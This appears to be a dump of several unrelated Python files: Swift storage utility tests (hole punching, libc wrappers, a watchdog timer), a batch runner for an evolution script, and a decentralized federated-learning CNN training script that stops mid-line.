1, 0) with self.assertRaises(ValueError): utils.punch_hole(0, 1, 1 << 64) self.assertEqual([], sys_fallocate_mock.mock_calls) # sanity check utils.punch_hole(0, 0, 1) self.assertEqual( [mock.call( 0, utils.FALLOC_FL_PUNCH_HOLE | utils.FALLOC_FL_KEEP_SIZE, mock.ANY, mock.ANY)], sys_fallocate_mock.mock_calls) # Go confirm the ctypes values separately; apparently == doesn't # work the way you'd expect with ctypes :-/ self.assertEqual(sys_fallocate_mock.mock_calls[0][1][2].value, 0) self.assertEqual(sys_fallocate_mock.mock_calls[0][1][3].value, 1) def test_no_fallocate(self, sys_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = False with self.assertRaises(OSError) as cm: utils.punch_hole(123, 456, 789) self.assertEqual(cm.exception.errno, errno.ENOTSUP) class TestPunchHoleReally(unittest.TestCase): def setUp(self): if not utils._sys_fallocate.available: raise unittest.SkipTest("utils._sys_fallocate not available") def test_punch_a_hole(self): with TemporaryFile() as tf: tf.write(b"x" * 64 + b"y" * 64 + b"z" * 64) tf.flush() # knock out the first half of the "y"s utils.punch_hole(tf.fileno(), 64, 32) tf.seek(0) contents = tf.read(4096) self.assertEqual( contents, b"x" * 64 + b"\0" * 32 + b"y" * 32 + b"z" * 64) class Test_LibcWrapper(unittest.TestCase): def test_available_function(self): # This should pretty much always exist getpid_wrapper = utils._LibcWrapper('getpid') self.assertTrue(getpid_wrapper.available) self.assertEqual(getpid_wrapper(), os.getpid()) def test_unavailable_function(self): # This won't exist no_func_wrapper = utils._LibcWrapper('diffractively_protectorship') self.assertFalse(no_func_wrapper.available) self.assertRaises(NotImplementedError, no_func_wrapper) def test_argument_plumbing(self): lseek_wrapper = utils._LibcWrapper('lseek') with TemporaryFile() as tf: tf.write(b"abcdefgh") tf.flush() lseek_wrapper(tf.fileno(), ctypes.c_uint64(3), # 0 is SEEK_SET 0) self.assertEqual(tf.read(100), b"defgh") class TestWatchdog(unittest.TestCase): def test_start_stop(self): w = utils.Watchdog() 
w._evt.send = mock.Mock(side_effect=w._evt.send) gth = object() with patch('eventlet.greenthread.getcurrent', return_value=gth),\ patch('time.time', return_value=10.0): # On first call, _next_expiration is None, it should unblock # greenthread that is blocked for ever key = w.start(1.0, Timeout) self.assertIn(key, w._timeouts) self.assertEqual(w._timeouts[key], (1.0, 11.0, gth, Timeout)) w._evt.send.assert_called_once() w.stop(key) self.assertNotIn(key, w._timeouts) def test_timeout_concurrency(self): w = utils.Watchdog() w._evt.send = mock.Mock(side_effect=w._evt.send) w._evt.wait = mock.Mock() gth = object() w._run() w._evt.wait.assert_called_once_with(None) with patch('eventlet.greenthread.getcurrent', return_value=gth): w._evt.send.reset_mock() w._evt.wait.reset_mock() with patch('time.time', return_value=10.00): # On first call, _next_expiration is None, it should unblock # greenthread that is blocked for ever w.start(5.0, Timeout) # Will end at 15.0 w._evt.send.assert_called_once() with patch('time.time', return_value=10.01): w._run() self.assertEqual(15.0, w._next_expiration) w._evt.wait.assert_called_once_with(15.0 - 10.01) w._evt.send.reset_mock() w._evt.wait.reset_mock() with patch('time.time', return_value=12.00): # Now _next_expiration is 15.0, it won't unblock greenthread # because this expiration is later w.start(5.0, Timeout) # Will end at 17.0 w._evt.send.assert_not_called() w._evt.send.reset_mock() w._evt.wait.reset_mock() with patch('time.time', return_value=14.00): # Now _next_expiration is still 15.0, it will unblock # greenthread because this new expiration is 14.5 w.start(0.5, Timeout) # Will end at 14.5 w._evt.send.assert_called_once() with patch('time.time', return_value=14.01): w._run() w._evt.wait.assert_called_once_with(14.5 - 14.01) self.assertEqual(14.5, w._next_expiration) # Should wakeup at 14.5 def test_timeout_expire(self): w = utils.Watchdog() w._evt.send = mock.Mock() # To avoid it to call get_hub() w._evt.wait = mock.Mock() # To avoid it to call get_hub() with patch('eventlet.hubs.get_hub') as m_gh: with patch('time.time', return_value=10.0): w.start(5.0, Timeout) # Will end at 15.0 with patch('time.time', return_value=16.0): w._run() m_gh.assert_called_once() m_gh.return_value.schedule_call_global.assert_called_once() exc = m_gh.return_value.schedule_call_global.call_args[0][2] self.assertIsInstance(exc, Timeout) self.assertEqual(exc.seconds, 5.0) self.assertEqual(None, w._next_expiration) w._evt.wait.assert_called_once_with(None)
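# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the test module above). It restates the
# reserve arithmetic that TestFallocateReserve exercises, for a byte-valued
# FALLOCATE_RESERVE only. `would_hit_reserve` is a hypothetical helper name;
# the real check lives inside utils.fallocate (swift.common.utils upstream).
import os


def would_hit_reserve(path, alloc_size, reserve_bytes):
    """Return True when allocating alloc_size bytes on the filesystem that
    holds `path` would leave no more than reserve_bytes free."""
    st = os.statvfs(path)
    # Same product the mocked statvfs results above encode: block size * free blocks.
    free_bytes = st.f_frsize * st.f_bavail
    return free_bytes - alloc_size <= reserve_bytes


# With 2 free blocks of 1024 bytes and a 1024-byte reserve, a 1023-byte
# allocation passes but a 1024-byte one is refused, mirroring
# test_enough_space / test_not_enough_space above.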
batchrun.py
import os
import time
from datetime import date
from datetime import datetime
import argparse
import multiprocessing

parser = argparse.ArgumentParser()
parser.add_argument("--runs", default=10, type=int, help="Change the number of evolution trials")
parser.add_argument("--newConfigFile", default=None, type=str, help="Use a different configuration file")
parser.add_argument("--probabilities", default=None, nargs=4, type=float, help="Set random network reaction probabilities")
parser.add_argument("--numGenerations", default=None, type=int, help="Set the max number of generations")
parser.add_argument("--multiprocess", default="True", type=str, help="Enable or disable multiprocessing")


def toBool(args):
    multiprocess = args.multiprocess.upper()
    if multiprocess.startswith("T"):
        return True
    else:
        return False


def parseProbabilities(probabilities):
    probString = ''
    for p in probabilities:
        probString += str(p) + ' '
    return probString


def runEvolution(args):
    command = 'python ./evolve.py'
    if args.newConfigFile:
        command += f' --newConfigFile {args.newConfigFile}'
    if args.numGenerations:
        command += f' --numGenerations {str(args.numGenerations)}'
    if args.probabilities:
        command += f' --probabilities {parseProbabilities(args.probabilities)}'

    today = date.today()
    now = datetime.now()
    start = time.time()

    # If not multiprocessing, enable printing and loop through batches
    if not toBool(args):
        print("Batch set up for " + str(args.runs) + " runs")
        print("Run Started on: ", today.strftime("%b-%d-%Y"))
        print("at time: ", now.strftime("%H:%M:%S"), '\n')
        for i in range(args.runs):
            if not toBool(args):
                print("-----------------------------------------------------")
                print(" --- BATCH NUMBER --- " + str(i+1) + ' out of ' + str(args.runs) + ' total.')
                print("-----------------------------------------------------")
            os.system(command)
        print("Time taken to do batch runs = ", time.time() - start)
    # If multiprocessing, then we will loop through the entire function each time, so disable printing
    # and run the command once per function
    else:
        os.system(command)


if __name__ == '__main__':
    args = parser.parse_args()

    # Multiprocess:
    if toBool(args):
        starttime = time.time()
        processes = []
        for i in range(args.runs):
            p = multiprocessing.Process(target=runEvolution, args=(args,))
            processes.append(p)
            p.start()

        for process in processes:
            process.join()

        print(f"Finished in {time.time()-starttime} seconds.")
    else:
        runEvolution(args)
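# ---------------------------------------------------------------------------
# Illustrative sketch (not part of batchrun.py above). batchrun.py starts one
# multiprocessing.Process per run all at once, which can oversubscribe the
# machine when --runs is large. Assuming batchrun.py is importable as a
# sibling module, a bounded variant could hand the runs to a fixed-size pool
# instead; `run_batch_with_pool` is a hypothetical name used only here.
import multiprocessing

from batchrun import parser, runEvolution  # assumed sibling module


def run_batch_with_pool(args, workers=4):
    """Run args.runs evolutions with at most `workers` concurrent processes."""
    with multiprocessing.Pool(processes=workers) as pool:
        # runEvolution is a module-level function, so it is picklable and can
        # be dispatched to worker processes like the original Process targets.
        pool.map(runEvolution, [args] * args.runs)


if __name__ == '__main__':
    run_batch_with_pool(parser.parse_args())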
federated_thzdata_sample_CNN.py
from __future__ import absolute_import, division, print_function, unicode_literals from keras.utils import to_categorical import numpy as np import tensorflow as tf import datetime import scipy.io as sio import multiprocessing import math from matplotlib.pyplot import pause import os import glob import argparse parser = argparse.ArgumentParser() parser.add_argument('-l1', default=0.1, help=" sets the learning rate (gradient exchange) for convolutional layer", type=float) parser.add_argument('-l2', default=0.1, help="sets the learning rate (gradient exchange) for FC layer", type=float) parser.add_argument('-mu', default=0.025, help="sets the learning rate for local SGD", type=float) parser.add_argument('-eps', default=1, help="sets the mixing parameters for model averaging (CFA)", type=float) parser.add_argument('-K', default=80, help="sets the number of network devices", type=int) parser.add_argument('-N', default=2, help="sets the number of neighbors per device", type=int) parser.add_argument('-T', default=120, help="sets the number of training epochs", type=int) parser.add_argument('-ro', default=0.99, help="sets the hyperparameter for MEWMA", type=float) args = parser.parse_args() # Parameters for learning rate optimization and batch size ################## learning_rate = args.mu learning_rate1 = args.l1 # mu_t \times beta (from paper) - layer 1 learning_rate2 = args.l2 # mu_t \times beta (from paper) - layer 2 training_epochs = args.T batch_size = 5 display_step = 10 # convolutional 1D parameters filter = 16 number = 8 pooling = 5 stride = 5 multip = 21 ############################################################################# # sets neighbor indexes for k-regular networks (number of neighbors is 'neighbors' def get_connectivity(ii_saved_local, neighbors, devices): if (ii_saved_local == 0): sets_neighbors_final = np.arange(ii_saved_local + 1, ii_saved_local + neighbors + 1) elif (ii_saved_local == devices - 1): sets_neighbors_final = np.arange(ii_saved_local - neighbors, ii_saved_local) elif (ii_saved_local >= math.ceil(neighbors / 2)) and (ii_saved_local <= devices - math.ceil(neighbors / 2) - 1): sets_neighbors = np.arange(ii_saved_local - math.floor(neighbors / 2), ii_saved_local + math.floor(neighbors / 2) + 1) index_ii = np.where(sets_neighbors == ii_saved_local) sets_neighbors_final = np.delete(sets_neighbors, index_ii) else: if (ii_saved_local - math.ceil(neighbors / 2) < 0): sets_neighbors = np.arange(0, neighbors + 1) else: sets_neighbors = np.arange(devices - neighbors - 1, devices) index_ii = np.where(sets_neighbors == ii_saved_local) sets_neighbors_final = np.delete(sets_neighbors, index_ii) return sets_neighbors_final # compute weights for CFA def federated_weights_computing2(filename, filename2, ii, ii2, epoch, devices,neighbors): saved_epoch = epoch b_v = 1/devices # eps_t_control = 1 #from paper eps_t_control = args.eps while not os.path.isfile(filename2): print('Waiting..') pause(1) try: mathcontent = sio.loadmat(filename2) except: print('Detected problem while loading file') pause(3) mathcontent = sio.loadmat(filename2) weights_current_l1 = mathcontent['weights1'] biases_current_l1 = mathcontent['biases1'] weights_current_l2 = mathcontent['weights2'] biases_current_l2 = mathcontent['biases2'] while not os.path.isfile(filename): print('Waiting..') pause(1) try: mathcontent = sio.loadmat(filename) except: print('Detected problem while loading file') pause(3) mathcontent = sio.loadmat(filename) balancing_vect = np.ones(devices)*b_v weight_factor = 
(balancing_vect[ii2]/(balancing_vect[ii2] + (neighbors-1)*balancing_vect[ii])) # equation (11) from paper updated_weights_l1 = weights_current_l1 + eps_t_control * weight_factor*(mathcontent['weights1'] - weights_current_l1) # see paper section 3 updated_biases_l1 = biases_current_l1 + eps_t_control*weight_factor*(mathcontent['biases1'] - biases_current_l1) updated_weights_l2 = weights_current_l2 + eps_t_control * weight_factor * (mathcontent['weights2'] - weights_current_l2) # see paper section 3 updated_biases_l2 = biases_current_l2 + eps_t_control * weight_factor * (mathcontent['biases2'] - biases_current_l2) weights_l1 = updated_weights_l1 biases_l1 = updated_biases_l1 weights_l2 = updated_weights_l2 biases_l2 = updated_biases_l2 try: sio.savemat('temp_datamat{}_{}.mat'.format(ii, saved_epoch), { "weights1": weights_l1, "biases1": biases_l1, "weights2": weights_l2, "biases2": biases_l2}) mathcontent = sio.loadmat('temp_datamat{}_{}.mat'.format(ii, saved_epoch)) except: print('Unable to save file .. retrying') pause(3) print(biases) sio.savemat('temp_datamat{}_{}.mat'.format(ii, saved_epoch), { "weights1": weights_l1, "biases1": biases_l1, "weights2": weights_l2, "biases2": biases_l2}) return weights_l1, biases_l1, weights_l2, biases_l2 def conv1d(x, W, b, strides=1): # Conv1D wrapper, with bias and relu activation x = tf.expand_dims(x, 2) x = tf.nn.conv1d(x, W, stride=stride, padding='SAME') x = tf.nn.bias_add(x, b) return tf.nn.relu(x) # CFA-GE 4 stage implementation def getFederatedWeight_gradients(n_W_l1, n_W_l2, n_b_l1, n_b_l2, federated, devices, ii_saved_local, epoch, v_loss,eng, x_train2, y_train2, neighbors, W_l1_saved, W_l2_saved, n_l1_saved, n_l2_saved): x_c = tf.placeholder(tf.float32, [None, 512]) # 512 point FFT range measurements y_c = tf.placeholder(tf.float32, [None, 8]) # 0-7 HR distances => 8 classes W_ext_c_l1 = tf.placeholder(tf.float32, [filter, 1, number]) b_ext_c_l1 = tf.placeholder(tf.float32, [number]) W_ext_c_l2 = tf.placeholder(tf.float32, [multip*number, 8]) b_ext_c_l2 = tf.placeholder(tf.float32, [8]) # Construct model Layer #1 CNN 1d, Layer #2 FC hidden1 = conv1d(x_c, W_ext_c_l1, b_ext_c_l1) hidden1 = tf.layers.max_pooling1d(hidden1, pool_size=stride, strides=stride, padding='SAME') fc1 = tf.reshape(hidden1, [-1, multip * number]) pred_c = tf.nn.softmax(tf.matmul(fc1, W_ext_c_l2) + b_ext_c_l2) # example 2 layers # Minimize error using cross entropy cost_c = tf.reduce_mean(-tf.reduce_sum(y_c * tf.log(tf.clip_by_value(pred_c, 1e-15, 0.99)), reduction_indices=1)) # obtain the gradients for each layer grad_W_c_l1, grad_b_c_l1, grad_W_c_l2, grad_b_c_l2 = tf.gradients(xs=[W_ext_c_l1, b_ext_c_l1, W_ext_c_l2, b_ext_c_l2], ys=cost_c) # Initialize the variables (i.e. 
assign their default value) init_c = tf.global_variables_initializer() if (federated): if devices > 1: if epoch == 0: sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2, "epoch": epoch, "loss_sample": v_loss}) W_up_l1 = n_W_l1 W_up_l2 = n_W_l2 n_up_l1 = n_b_l1 n_up_l2 = n_b_l2 else: sio.savemat('temp_datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2, "epoch": epoch, "loss_sample": v_loss}) neighbor_vec = get_connectivity(ii_saved_local, neighbors, devices) for neighbor_index in range(neighbor_vec.size): while not os.path.isfile( 'datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)) or not os.path.isfile( 'temp_datamat{}_{}.mat'.format(ii_saved_local, epoch)): # print('Waiting for datamat{}_{}.mat'.format(ii_saved_local - 1, epoch - 1)) pause(1) [W_up_l1, n_up_l1, W_up_l2, n_up_l2] = federated_weights_computing2('datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1), 'temp_datamat{}_{}.mat'.format(ii_saved_local, epoch), ii_saved_local, neighbor_vec[neighbor_index], epoch, devices, neighbors) pause(5) try: sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": W_up_l1, "biases1": n_up_l1, "weights2": W_up_l2, "biases2": n_up_l2}) mathcontent = sio.loadmat('datamat{}_{}.mat'.format(ii_saved_local, epoch)) except: print('Unable to save file .. retrying') pause(3) sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": W_up_l1, "biases1": n_up_l1, "weights2": W_up_l2, "biases2": n_up_l2}) while not os.path.isfile('datamat{}_{}.mat'.format(ii_saved_local, epoch)): # print('Waiting for datamat{}_{}.mat'.format(ii_saved_local, epoch)) pause(1) # waiting for other updates # expanded for gradient exchange pause(3) g_W_c_vect_l1 = np.zeros([filter, 1, number, devices]) g_b_c_vect_l1 = np.zeros([number, devices]) g_W_c_vect_l2 = np.zeros([multip*number, 8, devices]) g_b_c_vect_l2 = np.zeros([8, devices]) for neighbor_index in range(neighbor_vec.size): while not os.path.isfile( 'datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)): # print('Waiting for datamat{}_{}.mat'.format(ii_saved_local - 1, epoch)) pause(1) try: mathcontent = sio.loadmat('datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)) W_up_neigh_l1 = np.asarray(mathcontent['weights1']) n_up_neigh_l1 = np.squeeze(np.asarray(mathcontent['biases1'])) W_up_neigh_l2 = np.asarray(mathcontent['weights2']) n_up_neigh_l2 = np.squeeze(np.array(mathcontent['biases2'])) except: pause(5) mathcontent = sio.loadmat('datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)) W_up_neigh_l1 = np.asarray(mathcontent['weights1']) n_up_neigh_l1 = np.squeeze(np.asarray(mathcontent['biases1'])) W_up_neigh_l2 = np.asarray(mathcontent['weights2']) n_up_neigh_l2 = np.squeeze(np.array(mathcontent['biases2'])) with tf.Session() as sess3: sess3.run(init_c) g_W_c_l1, g_b_c_l1, g_W_c_l2, g_b_c_l2 = sess3.run([grad_W_c_l1, grad_b_c_l1, grad_W_c_l2, grad_b_c_l2], feed_dict={x_c: x_train2, y_c: y_train2, W_ext_c_l1: W_up_neigh_l1, b_ext_c_l1: n_up_neigh_l1, W_ext_c_l2: W_up_neigh_l2, b_ext_c_l2: n_up_neigh_l2}) g_W_c_vect_l1[:, :, :, neighbor_vec[neighbor_index]] = g_W_c_l1 g_b_c_vect_l1[:, neighbor_vec[neighbor_index]] = g_b_c_l1 g_W_c_vect_l2[:, :, neighbor_vec[neighbor_index]] = g_W_c_l2 g_b_c_vect_l2[:, neighbor_vec[neighbor_index]] = g_b_c_l2 # save gradients and upload try: 
sio.savemat('datagrad{}_{}.mat'.format(ii_saved_local, epoch), { "grad_weights1": g_W_c_vect_l1, "grad_biases1": g_b_c_vect_l1, "grad_weights2": g_W_c_vect_l2, "grad_biases2": g_b_c_vect_l2, "epoch": epoch}) # waiting for other gradient updates pause(5) mathcontent = sio.loadmat('datagrad{}_{}.mat'.format(ii_saved_local, epoch)) test_var = mathcontent['grad_biases1'] del mathcontent except: print('Unable to save file .. retrying') pause(3) sio.savemat('datagrad{}_{}.mat'.format(ii_saved_local, epoch), { "grad_weights1": g_W_c_vect_l1, "grad_biases1": g_b_c_vect_l1, "grad_weights2": g_W_c_vect_l2, "grad_biases2": g_b_c_vect_l2, "epoch": epoch}) # waiting for other gradient updates pause(5) try: mathcontent = sio.loadmat('datamat{}_{}.mat'.format(ii_saved_local, epoch)) W_up_l1 = np.asarray(mathcontent['weights1']) n_up_l1 = np.squeeze(np.asarray(mathcontent['biases1'])) W_up_l2 = np.asarray(mathcontent['weights2']) n_up_l2 = np.squeeze(np.asarray(mathcontent['biases2'])) except: pause(5) mathcontent = sio.loadmat('datamat{}_{}.mat'.format(ii_saved_local, epoch)) W_up_l1 = np.asarray(mathcontent['weights1']) n_up_l1 = np.squeeze(np.asarray(mathcontent['biases1'])) W_up_l2 = np.asarray(mathcontent['weights2']) n_up_l2 = np.squeeze(np.asarray(mathcontent['biases2'])) # update local model with neighbor gradients for neighbor_index in range(neighbor_vec.size): while not os.path.isfile( 'datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)): pause(1) try: mathcontent = sio.loadmat('datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)) except: pause(3) mathcontent = sio.loadmat('datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)) gradW_up_neigh_l1 = np.asarray(mathcontent['grad_weights1']) gradW_up_neigh_l2 = np.asarray(mathcontent['grad_weights2']) try: gradn_up_neigh_l1 = np.squeeze(np.asarray(mathcontent['grad_biases1'])) gradn_up_neigh_l2 = np.squeeze(np.asarray(mathcontent['grad_biases2'])) except: pause(5) print('datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)) del mathcontent mathcontent = sio.loadmat('datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)) gradW_up_neigh_l1 = np.asarray(mathcontent['grad_weights1']) gradW_up_neigh_l2 = np.asarray(mathcontent['grad_weights2']) gradn_up_neigh_l1 = np.squeeze(np.asarray(mathcontent['grad_biases1'])) gradn_up_neigh_l2 = np.squeeze(np.asarray(mathcontent['grad_biases2'])) # MEWMA UPDATE mewma = args.ro # saving gradients if epoch == 1: W_l1_saved[:, :, :, neighbor_index] = gradW_up_neigh_l1[:, :, :, ii_saved_local] W_l2_saved[:, :, neighbor_index] = gradW_up_neigh_l2[:, :, ii_saved_local] n_l1_saved[:, neighbor_index] = gradn_up_neigh_l1[:, ii_saved_local] n_l2_saved[:, neighbor_index] = gradn_up_neigh_l2[:, ii_saved_local] else: W_l1_saved[:, :, :, neighbor_index] = mewma * gradW_up_neigh_l1[:, :, :, ii_saved_local] + (1 - mewma) * W_l1_saved[:, :, :, neighbor_index] W_l2_saved[:, :, neighbor_index] = mewma * gradW_up_neigh_l2[:, :, ii_saved_local] + (1 - mewma) * W_l2_saved[:, :, neighbor_index] n_l1_saved[:, neighbor_index] = mewma * gradn_up_neigh_l1[:, ii_saved_local] + (1 - mewma) * n_l1_saved[:, neighbor_index] n_l2_saved[:, neighbor_index] = mewma * gradn_up_neigh_l2[:, ii_saved_local] + (1 - mewma) * n_l2_saved[:, neighbor_index] W_up_l1 = W_up_l1 - learning_rate1 * gradW_up_neigh_l1[:, :, :, ii_saved_local] n_up_l1 = n_up_l1 - learning_rate1 * gradn_up_neigh_l1[:, ii_saved_local] W_up_l2 = W_up_l2 - learning_rate2 * gradW_up_neigh_l2[:, :, ii_saved_local] n_up_l2 = n_up_l2 - 
learning_rate2 * gradn_up_neigh_l2[:, ii_saved_local] else: W_up_l1 = n_W_l1 W_up_l2 = n_W_l2 n_up_l1 = n_b_l1 n_up_l2 = n_b_l2 else: W_up_l1 = n_W_l1 W_up_l2 = n_W_l2 n_up_l1 = n_b_l1 n_up_l2 = n_b_l2 return W_up_l1, n_up_l1, W_up_l2, n_up_l2, W_l1_saved, W_l2_saved, n_l1_saved, n_l2_saved # CFA - GE: 2 stage (or fast) negotiation def getFederatedWeight_gradients_fast(n_W_l1, n_W_l2, n_b_l1, n_b_l2, federated, devices, ii_saved_local, epoch, v_loss,eng, x_train2, y_train2, neighbors, W_l1_saved, W_l2_saved, n_l1_saved, n_l2_saved): x_c = tf.placeholder(tf.float32, [None, 512]) # 512 point FFT range measurements y_c = tf.placeholder(tf.float32, [None, 8]) # 0-7 HR distances => 8 classes W_ext_c_l1 = tf.placeholder(tf.float32, [filter, 1, number]) b_ext_c_l1 = tf.placeholder(tf.float32, [number]) W_ext_c_l2 = tf.placeholder(tf.float32, [multip*number, 8]) b_ext_c_l2 = tf.placeholder(tf.float32, [8]) # Construct model Layer #1 CNN 1d, Layer #2 FC hidden1 = conv1d(x_c, W_ext_c_l1, b_ext_c_l1) hidden1 = tf.layers.max_pooling1d(hidden1, pool_size=stride, strides=stride, padding='SAME') fc1 = tf.reshape(hidden1, [-1, multip * number]) pred_c = tf.nn.softmax(tf.matmul(fc1, W_ext_c_l2) + b_ext_c_l2) # example 2 layers # Minimize error using cross entropy cost_c = tf.reduce_mean(-tf.reduce_sum(y_c * tf.log(tf.clip_by_value(pred_c, 1e-15, 0.99)), reduction_indices=1)) # obtain the gradients for each layer grad_W_c_l1, grad_b_c_l1, grad_W_c_l2, grad_b_c_l2 = tf.gradients(xs=[W_ext_c_l1, b_ext_c_l1, W_ext_c_l2, b_ext_c_l2], ys=cost_c) # Initialize the variables (i.e. assign their default value) init_c = tf.global_variables_initializer() if (federated): if devices > 1: if epoch == 0: sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2, "epoch": epoch, "loss_sample": v_loss}) W_up_l1 = n_W_l1 W_up_l2 = n_W_l2 n_up_l1 = n_b_l1 n_up_l2 = n_b_l2 else: sio.savemat('temp_datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2, "epoch": epoch, "loss_sample": v_loss}) neighbor_vec = get_connectivity(ii_saved_local, neighbors, devices) for neighbor_index in range(neighbor_vec.size): while not os.path.isfile( 'datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)) or not os.path.isfile( 'temp_datamat{}_{}.mat'.format(ii_saved_local, epoch)): # print('Waiting for datamat{}_{}.mat'.format(ii_saved_local - 1, epoch - 1)) pause(1) [W_up_l1, n_up_l1, W_up_l2, n_up_l2] = federated_weights_computing2( 'datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1), 'temp_datamat{}_{}.mat'.format(ii_saved_local, epoch), ii_saved_local, neighbor_vec[neighbor_index], epoch, devices, neighbors) pause(5) W_up_l1 = np.asarray(W_up_l1) n_up_l1 = np.squeeze(np.asarray(n_up_l1)) W_up_l2 = np.asarray(W_up_l2) n_up_l2 = np.squeeze(np.asarray(n_up_l2)) pause(3) try: sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2}) mathcontent = sio.loadmat('datamat{}_{}.mat'.format(ii_saved_local, epoch)) except: print('Unable to save file .. 
retrying') pause(3) sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2}) g_W_c_vect_l1 = np.zeros([filter, 1, number, devices]) g_b_c_vect_l1 = np.zeros([number, devices]) g_W_c_vect_l2 = np.zeros([multip * number, 8, devices]) g_b_c_vect_l2 = np.zeros([8, devices]) for neighbor_index in range(neighbor_vec.size): while not os.path.isfile( 'datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)): # print('Waiting for datamat{}_{}.mat'.format(ii_saved_local - 1, epoch)) pause(1) try: mathcontent = sio.loadmat('datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)) W_up_neigh_l1 = np.asarray(mathcontent['weights1']) n_up_neigh_l1 = np.squeeze(np.asarray(mathcontent['biases1'])) W_up_neigh_l2 = np.asarray(mathcontent['weights2']) n_up_neigh_l2 = np.squeeze(np.array(mathcontent['biases2'])) except: pause(5) mathcontent = sio.loadmat('datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)) W_up_neigh_l1 = np.asarray(mathcontent['weights1']) n_up_neigh_l1 = np.squeeze(np.asarray(mathcontent['biases1'])) W_up_neigh_l2 = np.asarray(mathcontent['weights2']) n_up_neigh_l2 = np.squeeze(np.array(mathcontent['biases2'])) with tf.Session() as sess3: sess3.run(init_c) g_W_c_l1, g_b_c_l1, g_W_c_l2, g_b_c_l2 = sess3.run( [grad_W_c_l1, grad_b_c_l1, grad_W_c_l2, grad_b_c_l2], feed_dict={x_c: x_train2, y_c: y_train2, W_ext_c_l1: W_up_neigh_l1, b_ext_c_l1: n_up_neigh_l1, W_ext_c_l2: W_up_neigh_l2, b_ext_c_l2: n_up_neigh_l2}) g_W_c_vect_l1[:, :, :, neighbor_vec[neighbor_index]] = g_W_c_l1 g_b_c_vect_l1[:, neighbor_vec[neighbor_index]] = g_b_c_l1 g_W_c_vect_l2[:, :, neighbor_vec[neighbor_index]] = g_W_c_l2 g_b_c_vect_l2[:, neighbor_vec[neighbor_index]] = g_b_c_l2 # save gradients and upload try: sio.savemat('datagrad{}_{}.mat'.format(ii_saved_local, epoch), { "grad_weights1": g_W_c_vect_l1, "grad_biases1": g_b_c_vect_l1, "grad_weights2": g_W_c_vect_l2, "grad_biases2": g_b_c_vect_l2, "epoch": epoch}) # waiting for other gradient updates pause(5) mathcontent = sio.loadmat('datagrad{}_{}.mat'.format(ii_saved_local, epoch)) test_var = mathcontent['grad_biases1'] del mathcontent except: print('Unable to save file .. 
retrying') pause(3) sio.savemat('datagrad{}_{}.mat'.format(ii_saved_local, epoch), { "grad_weights1": g_W_c_vect_l1, "grad_biases1": g_b_c_vect_l1, "grad_weights2": g_W_c_vect_l2, "grad_biases2": g_b_c_vect_l2, "epoch": epoch}) # free space (cache files) if epoch >= 9: fileList_grad = glob.glob('datagrad{}_{}.mat'.format(ii_saved_local, epoch-8), recursive=False) for filePath in fileList_grad: try: os.remove(filePath) # Garbage collector active (removing unused cache files) except OSError: print("Error while deleting file") # waiting for other gradient updates pause(5) # update local model with neighbor gradients for neighbor_index in range(neighbor_vec.size): while not os.path.isfile( 'datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)): pause(1) try: mathcontent = sio.loadmat('datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)) except: pause(3) mathcontent = sio.loadmat('datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)) gradW_up_neigh_l1 = np.asarray(mathcontent['grad_weights1']) gradW_up_neigh_l2 = np.asarray(mathcontent['grad_weights2']) try: gradn_up_neigh_l1 = np.squeeze(np.asarray(mathcontent['grad_biases1'])) gradn_up_neigh_l2 = np.squeeze(np.asarray(mathcontent['grad_biases2'])) except: pause(5) print('datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)) del mathcontent mathcontent = sio.loadmat('datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)) gradW_up_neigh_l1 = np.asarray(mathcontent['grad_weights1']) gradW_up_neigh_l2 = np.asarray(mathcontent['grad_weights2']) gradn_up_neigh_l1 = np.squeeze(np.asarray(mathcontent['grad_biases1'])) gradn_up_neigh_l2 = np.squeeze(np.asarray(mathcontent['grad_biases2'])) # MEWMA UPDATE mewma = args.ro # saving gradients W_l1_saved[:, :, :, neighbor_index] = mewma * gradW_up_neigh_l1[:, :, :, ii_saved_local] + (1 - mewma) * W_l1_saved[:, :, :, neighbor_index] W_l2_saved[:, :, neighbor_index] = mewma * gradW_up_neigh_l2[:, :, ii_saved_local] + (1 - mewma) * W_l2_saved[:, :, neighbor_index] n_l1_saved[:, neighbor_index] = mewma * gradn_up_neigh_l1[:, ii_saved_local] + (1 